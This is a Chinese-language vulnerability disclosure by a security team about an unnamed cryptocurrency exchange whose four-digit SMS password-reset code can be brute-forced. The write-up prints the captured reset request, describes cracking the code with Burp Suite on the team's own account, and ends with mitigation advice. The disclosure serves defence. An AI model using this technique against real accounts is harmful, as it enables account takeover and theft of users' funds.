日前,BYSEC安全团队发现一交易所的逻辑漏洞。据分析,黑客可以通过暴力破解并且修改账户密码。
旨在保证交易所的资金安全,督促其及时修复漏洞,BYSEC将披露此漏洞以及黑客的攻击手法,并提供安全建议,望各大交易所防患于未然。
一:登陆账号(以自己账号为例),并找回验证码
图片来源于BYSEC
在找回密码的地方,同样由于验证码只有四位,且有效期并不是短信所说的五分钟,可对验证码进行暴力破解。
找回密码的地方发送验证码后抓包
POST /index.php/index/login/findpwd.html HTTP/1.1
Host: www.xxx.com
Content-Length: 119
Accept: */*
Origin: http://www.xxx.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.xx/index.php/index/login/findpwd.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=163c8a60f6159c-0b4bd043eec36-5e183017-13c680-163c8a60f626f9; parent_qimo_sid_e9218490-6333-11e8-a3c9-b1478a226697=35fdda40-67c4-11e8-83e4-79a21b6dfa62; accessId=e9218490-6333-11e8-a3c9-b1478a226697; pageViewNum=47; UM_distinctid=163c995bcfe252-0d945e09fb268f-5e183017-13c680-163c995bcff46f; bad_ide9218490-6333-11e8-a3c9-b1478a226697=ee01da81-679f-11e8-823a-23b1a05aa1d6; PHPSESSID=l1qlol0kf3fnja716emjaotf90; CNZZDATA1273849067=1079089793-1528075768-%7C1528101117; names=4015pF5qhMZgbLFCCuwQtNG2VYYlyMnhmmNUSRlT9HIhwDyDUD1rxxryXPM1
Connection: close
userType=1&userName=1381&countryCode=%2B86&smsCode=4314&imgCode=gkc&newPassword=123456qwe&newPasswords=123456qwe
这里用自己的账号进行测试,针对四位验证码smsCode进行爆破
成功爆破出四位验证码然后重置密码
二:使用Burp Suite工具成功爆破出四位验证码,重置密码为123456qwe (重置前密码是123456ttt)
图片来源于BYSEC
三、和手机收到的验证码一致
图片来源于BYSEC
四、利用重置的密码成功登录账户
图片来源于BYSEC
对此,BYSEC对广大交易所提出安全建议:
1、添加验证码机制,加入图片(验证码动态生成且满足随机性)或者短信验证码(验证码具备超时时限一般为1分钟,且在该时限内错误次数超过3次则进行锁定1分钟后方能重新获取验证码,超时后验证码自动失效)!
2、验证码必须在服务器端进行校验,客户端的一切校验都是不安全的!
网友评论